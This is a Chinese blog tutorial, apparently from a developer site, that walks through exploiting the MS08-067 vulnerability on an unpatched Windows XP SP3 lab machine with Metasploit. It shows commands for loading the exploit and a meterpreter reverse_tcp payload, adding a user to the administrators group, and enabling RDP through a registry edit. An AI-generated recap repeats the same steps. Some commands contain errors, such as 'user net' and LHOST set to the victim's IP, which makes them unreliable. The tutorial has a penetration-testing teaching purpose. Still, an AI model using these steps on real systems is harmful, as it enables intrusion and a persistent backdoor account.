WIN xp sp3 系统上Ms08_067_netapi漏洞利用

本文介绍如何利用MS08-067漏洞获得目标系统的高权限,并通过建立新用户及提权实现远程连接。适用于无补丁的WINxpsp3系统。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Ms08_067_netapi是一款Metasploit中有点老的溢出攻击载荷,攻击可以获得一个相对高的权限;

1:准备工作:WINxp sp3 系统(无补丁)
下载地址:
http://blog.youkuaiyun.com/sql_injection/article/details/47683419
攻击kali ip:192.168.243.133
靶机 ip :192.168.243.136
2:准备工作完成后开启kali打开终端metasploit中的msfconsole框架
命令 :
msfconsole
打开metasploit之前需要连接上postgresql:
service postgresql statr
3:寻找和加载Ms08_067模块
(1):使用搜索命令搜索此模块:
search ms08_067_netapi
(2):应用搜索到的模块地址:
use exploit/windows/smb/ms08_067_netapi
4:我们来加载一枚payload:
set payload windows/meterpreter/reverse_tcp

此时加载完毕可以查看需要设置的参数:
show options

然后如下图所示:
5:上图所示的 RHOST 为靶机的 ip, LHOST为kali 的ip:
set RHOST 被攻击者ip
set LHOST 被攻击者ip
然后进行攻击:
exploit


6:出现meterpreter命令后说明攻击成功,此时输入shell进入靶机cmd界面对其建立新的用户,并且提权:

(1):建立用户:
user net 用户名 密码 /add

(2):提权:
net localgroup administrators wmc /add




7:提权过后就可以进行远程连接登入了,但是此时要查看靶机是否打开了3389端口,因为此端口是用来进行远程连接的:
(1):查看是否打开:
netstat -na



(2):显然并没有,那么我们就给它打开: 
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
可以看到,3389端口已经打开。

8:接下来就用自己本机系统进行远程连接搞事情就可以了:
(1)打开cmd输入远程连接命令:
(2)此时计算机名输入靶机的ip地址就可以了,之后输入你自己建立的用户名和密码:

(3):就成功进入了:

此时完成所有操作。
总结:
此时靶机上也有了你创建的新用户。
要使用没有补丁的靶机,不然攻击时会失败。


利用MS08_067漏洞进行渗透测试,首先需要确保你的Kali Linux环境已经搭建好,并安装了Metasploit框架。以下是详细步骤: 参考资源链接:[2022太原理工大学网络攻防实验:MS08_067漏洞与渗透测试](https://wenku.youkuaiyun.com/doc/7bkch3qp7u?spm=1055.2569.3001.10343) 1. 打开Kali Linux系统,启动Metasploit框架。 2. 在Metasploit中搜索MS08_067漏洞的exploit模块,可以通过输入命令'search ms08_067'来查找。 3. 加载找到的exploit模块,使用命令'exploit/windows/smb/ms08_067_netapi'。 4. 设置攻击载荷(payload),可以使用'payload windows/meterpreter/reverse_tcp',同时配置LHOST和LPORT,以确保攻击者机器能够接收反向连接。 5. 指定目标主机的RHOST选项,即攻击的目标IP地址。 6. 运行exploit模块,如果目标存在MS08_067漏洞,Metasploit将会尝试建立连接并执行载荷。 7. 成功后,攻击者将获得目标系统的Meterpreter会话,进而可以执行进一步的内网渗透和横向移动。 8. 了解并掌握这些步骤后,建议深入学习如何在合法的靶场环境中进行实践,以便更好地理解和应用这些概念。 通过以上步骤,你将能够掌握在Kali Linux中使用Metasploit利用MS08_067漏洞进行渗透测试的基本技能。为了更深入理解网络攻防技术,建议阅读《2022太原理工大学网络攻防实验:MS08_067漏洞与渗透测试》。该资料详细介绍了MS08_067漏洞的验证与利用,并结合了其他关键实验,如SQL注入、文件上传和文件包含漏洞利用与防护,为你提供全面的渗透测试学习路径。 参考资源链接:[2022太原理工大学网络攻防实验:MS08_067漏洞与渗透测试](https://wenku.youkuaiyun.com/doc/7bkch3qp7u?spm=1055.2569.3001.10343)
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值